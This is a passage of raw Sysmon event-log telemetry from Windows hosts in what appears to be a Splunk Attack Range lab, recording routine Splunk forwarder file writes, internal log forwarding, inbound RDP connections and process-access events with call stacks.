Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D4A4152E706B9733C51F98EDB25F1F,SHA256=3C68D6A032D80B8867917A0DD4C8DB6401AD7CD8193549588FF5F00D59BE671A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:46.974{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9AAA193724FB565BFCC5C79C98D23F9,SHA256=A80C183CF55CB306AC683CE5F536913B9861420821DCCA46DCE42EA2FB06CED8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977578Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:46.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=003107179FE2DC6FC1FEF67BE8AB5927,SHA256=2EDB07031F6CC7E52D2529E2E1B9DFB7A3B0D8B2EBCF95FAEDA55F2222A7F177,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977577Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:43.610{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-22883-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.768{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53271-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000977579Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:47.919{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3DB3360CBD28FBAE0ABE4A0D3C5CA82,SHA256=A5B2D4319EEC077BDAC390599C5973D3BDF1C17F6166F0763C2C0FC7AD35EFD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977581Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:48.935{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1577BE75EA368F538292DE267909DBBD,SHA256=3251ECC717E273A04A765A3B4CA5644643C0F8ACB85158F4FDC3127FA6D0FDA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:48.358{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:48.105{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DF79F06D4F6769E29F407C6D1324537,SHA256=D5F61E20D494E423DBA9EC947D2119A4AE6ED795F58D303B8F415B7844D0D5A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977580Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:48.731{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A3F9D41FAB4178D5186A6D8341E695D,SHA256=E07736487E3E93DAA0AC58045374E413FCF18F8012E5803EA3D70C4BDDFBAF95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:49.988{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:49.756{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:49.123{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0A44ED20CD1E8394F0120DFB1A56E7,SHA256=038977DEE4B113139EECD44B9FF7D7E0C9D056C3EB64546D4019A8E268A9B4C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977582Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:46.892{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59310-false10.0.1.12-8000- 23542300x8000000000000000977583Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:50.169{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7EDBE2004D6FB98211E8B3A0EE8E2E,SHA256=CCF789D11EB5B9C0B4A16CD45440A96B35C4AEE14B3BE9C1249AD48CA570DD0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:50.141{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1263961E677D3FA9791E3ADD4166BF86,SHA256=93A77D433C9DCD845A500B8018398ACF6DCA33AA8662D6D682622029B0052E9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977584Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:51.403{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4816014BAD4C4F3C32A3934E61DAC66,SHA256=B605E0F166CBEE58C400696C3CC5E361B628323674499E7A6DC983EA388A4CC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:51.147{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=876BFC52216463AC719A6F238C585EA6,SHA256=0CE2057D8D1EEA9C9BC9C191CA5A50844A70B78B66734CD194F5A005EFC5BA61,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977588Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:49.134{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55557-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977587Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:48.722{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-52529-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977586Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:52.575{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3873876974A4022766CE32E958464E65,SHA256=3E34EFD9C7DAA95F35A66CD3FA7E80AF0D97D431981D7ED813C63F16FF0CE0FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977585Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:52.419{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61AB295E1A21E8A8425E1C6C56C0B488,SHA256=AEF71F3E3D08258917FDD1CF3FC612A95D802C7AA7A0685A0FD388536081249C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:52.148{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC49F81E0825FEA2D345475B2E8E87D,SHA256=086F1A722A04AC6CA5C8C61C71F75D1D6E09B4D6F2AD7F9C9ADEA7F295C32BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977590Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:53.653{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7832B9767F2F96AED8ACBD5F0BB16A08,SHA256=9F50B6A1261459D102C2CE351FE278CE49103DA837020F7BA47CE3DE7D813FF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977589Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:53.653{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A0C7EB73C3C99CA315F3420278C653,SHA256=7BCE302A9B2F87BB57B54CD4F227C99C2DFB8922B539A9BD3DF2155D9151B81A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:53.878{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B9DD017BCB667C07810F5EE6C029C79,SHA256=FEC97E1D0F5FF570FE57D0D1E6560B792E6CA5EA983C40CE60484817A53C6F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:53.878{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B886AC4276969FB0BCA6A4149B2A4753,SHA256=9DD2A613CE53EA3252D765819FEA906E32C124081BDDCF3296161C82C186367E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:53.348{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2350DD2D660886B140F28BA6DB7D2F92,SHA256=93A687414D8E5177343624F041D8EB3DC3F6F552ECA63B67FFD8E31D21438B83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:50.786{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53272-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000977592Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:54.811{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5145063FD4F73BC84CD443685AB4B9C,SHA256=6EB4176DE46E200A57A3D279E5B72220A66AEE0E10228AF88F74E33BFBD08995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.882{5EBD8912-8972-6151-0C7A-00000000FC01}49801424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:52.991{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57346-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8972-6151-0C7A-00000000FC01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8972-6151-0C7A-00000000FC01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.713{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8972-6151-0C7A-00000000FC01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.698{5EBD8912-8972-6151-0C7A-00000000FC01}4980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.350{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9969D8AD8019BAD72A1A963CA11886C3,SHA256=BB950CF33FD1661CAC597B9A288C5E26F461716578ED8D68EA4C9EFB90FBD531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977591Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:54.532{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4302MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.231{5EBD8912-8972-6151-0B7A-00000000FC01}65681644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:52.272{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64263-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.047{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8972-6151-0B7A-00000000FC01}6568C:\Program 